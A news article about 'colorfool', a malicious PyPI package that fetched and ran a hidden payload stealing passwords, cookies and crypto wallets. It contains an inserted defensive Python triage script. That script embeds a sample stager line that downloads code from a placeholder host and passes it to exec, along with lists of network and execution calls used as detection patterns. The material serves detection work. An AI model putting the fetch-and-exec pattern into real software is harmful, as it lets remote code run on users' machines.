Another PyPI package turns out to be just a malware payload


Security researchers have discovered another malicious PyPI package whose purpose is to steal people's sensitive data and give unauthenticated users access to the compromised device.

The package, named "colorfool," was obviously malicious, they said. It contained a Python file of "suspicious size" whose sole task was to download another file from the Internet and execute it, while ensuring that it remained hidden from the device user.

"The function therefore immediately appeared suspicious and likely malicious," the report said.

Code "Borrowing"

To make matters worse, that wasn't even the only suspicious element in this case. The URL from which the package would download its payload was hardcoded, which is another red flag.
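The two indicators the article has described so far, a module whose job is to fetch a file from a hardcoded URL and execute it, and a file of unusual size, can be checked statically without ever running the package. The following is an added example written for this article, not code from the researchers or from any vendor: it parses a Python source file with the standard `ast` module and flags the combination of a literal http(s) URL, a network fetch and an execution sink. The call-name lists, the size threshold, and the two embedded sample modules (a constructed stager-style file and a constructed benign file) are assumptions chosen for illustration; a real triage pipeline would tune them against a package corpus.

```python
"""Static triage of a Python module for the download-and-execute pattern.

Added example for illustration only; not the article's or any vendor's code.
The heuristics, thresholds and sample sources below are assumptions.
"""
import ast
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Function names that fetch content over the network (assumed, illustrative list).
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post"}
# Function names that turn fetched data into running code or processes.
EXEC_SINKS = {"exec", "eval", "system", "popen", "Popen", "run", "call"}
URL_RE = re.compile(r"^https?://", re.IGNORECASE)
# Assumed threshold: a single module far larger than its siblings is a red flag.
SUSPICIOUS_SIZE_BYTES = 50_000


@dataclass
class TriageResult:
    hardcoded_urls: List[str] = field(default_factory=list)
    network_calls: List[str] = field(default_factory=list)
    exec_sinks: List[str] = field(default_factory=list)
    oversized: bool = False

    @property
    def suspicious(self) -> bool:
        # Flag only the full chain: literal URL + network fetch + execution sink.
        return bool(self.hardcoded_urls and self.network_calls and self.exec_sinks)


def _call_name(node: ast.Call) -> str:
    """Return the bare function name of a call, e.g. 'urlopen' for urllib.request.urlopen(...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def triage_source(source: str, size_bytes: Optional[int] = None) -> TriageResult:
    """Walk the AST once and collect URL literals, fetch calls and execution sinks."""
    result = TriageResult()
    size = len(source.encode()) if size_bytes is None else size_bytes
    result.oversized = size > SUSPICIOUS_SIZE_BYTES
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str) and URL_RE.match(node.value):
            result.hardcoded_urls.append(node.value)
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in NETWORK_CALLS:
                result.network_calls.append(f"{name}:L{node.lineno}")
            elif name in EXEC_SINKS:
                result.exec_sinks.append(f"{name}:L{node.lineno}")
    return result


# Constructed sample: a stager-style module of the kind the article describes.
# It is parsed, never executed; the URL is a placeholder.
SAMPLE_STAGER = '''
import urllib.request
def run():
    data = urllib.request.urlopen("https://example.invalid/stage2.py").read()
    exec(data)
'''

# Constructed benign sample: a URL constant with no fetch and no execution sink.
SAMPLE_BENIGN = '''
HOMEPAGE = "https://example.invalid/docs"
def version():
    return "1.0"
'''

if __name__ == "__main__":
    for label, src in (("stager", SAMPLE_STAGER), ("benign", SAMPLE_BENIGN)):
        r = triage_source(src)
        print(label, "suspicious" if r.suspicious else "clean", r)
```

The benign sample shows why the check requires all three indicators together: a bare URL literal, as in a homepage constant, is common and harmless on its own, and only its combination with a fetch and an execution sink in the same module reproduces the behaviour the researchers called out. The size flag is reported separately, since an oversized file is a reason to look closer rather than a verdict by itself.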

The Python script, code.py, had information-stealing features such as keylogging and cookie exfiltration. Furthermore, it was capable of stealing passwords, killing apps, taking screenshots, stealing data from crypto wallets, and even using the device's webcam.

What sets this package apart from the other malicious PyPI packages security researchers discover on an almost daily basis is its Frankenstein-like nature. The code was assembled from pieces of other people's work, sometimes without regard to logic, code flow or anything else, the researchers suggest, as if the author had simply copied and pasted parts of the code, often leaving excess code behind.

"The combination of obfuscation and egregious malicious code indicates that it is unlikely that all of the code was developed by a single entity," the researchers said. "The final developer may have mostly used other people's code, adding it by copy-pasting."

In fact, the code even includes the "Snake" game, which doesn't seem to serve any particular purpose.

For researchers, this is a perfect example of the "democratization of cybercrime," where threat actors can simply take other threat actors' code and incorporate it into their work.

Via: The Register